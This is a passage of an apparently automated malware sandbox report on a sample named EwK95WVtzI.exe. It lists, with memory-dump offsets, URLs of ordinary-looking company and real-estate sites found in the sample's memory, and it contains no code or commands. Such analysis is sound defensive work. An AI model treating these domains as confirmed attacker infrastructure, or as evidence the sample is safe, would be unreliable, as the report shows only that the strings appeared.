                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.serviceplan.com/presse/news.html#news2832
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.serviceplan.com/serviceplan/vision.html
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.serviceplan.com/startseite.html
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.serviceplan.com/uploads/pics/logo_fb_sp.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sgepri.sgcc.com.cn/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sjbs.org/(
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sjbs.org/O
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.snugpak.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.snugpak.com/B
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.snugpak.com/b
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.snugpak.com/eft-edge
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.snugpak.com/k
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.spanesi.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.spanesi.com/P
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.spanesi.com/Y
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.spanesi.com/a
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stajum.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stnic.co.uk/
                Source: EwK95WVtzI.exe, 00000000.00000002.2779781613.0000000005ADD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.synetik.net
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.synetik.net/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.synetik.net/g
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t-tre.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t-tre.com/(
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.com/9~
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.com/m/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.com/v1.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.tnbio.org
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.transsib.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.transsib.com/l3
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tvtools.fi/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tvtools.fi/O
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tvtools.fi/T
                Source: EwK95WVtzI.exe, 00000000.00000003.2065701506.00000000077A0000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tyrns.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tyrns.com//
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tyrns.com/J
                Source: EwK95WVtzI.exe, 00000000.00000003.2065701506.00000000077A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tyrns.com/K
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.udesign.biz/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.udesign.biz/1
                Source: EwK95WVtzI.exe, 00000000.00000002.2773875480.0000000004D8D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2065701506.00000000077A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.2065701506.00000000077A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com/3
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com/?o
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com/F
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com/N~
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com/Ro
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valdal.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valdal.com/C_
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#breadcrumb
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#webpage
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#website
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/177-appartement-a-vendre-sigean-30378
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/180-maison-a-vendre-milly-la-foret-41465
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/182-maison-a-vendre-royan-41301
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/184-appartement-a-vendre-valras-plage-41841
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/187-maison-a-vendre-bourg-saint-maurice-41586
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/189-appartement-a-vendre-ajaccio-41880
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/192-loffre-immobiliere-a-nogent-le-rotrou
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/195-coup-doeil-sur-le-marche-immobilier-a-chalon-sur-saone
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/200-acheter-un-bien-a-plusieurs-a-briancon
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/203-achat-appartement-nice-reussir-son-investissement-locatif
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/?s=
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/achat-par-ville
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/astuces
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/comments/feed
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 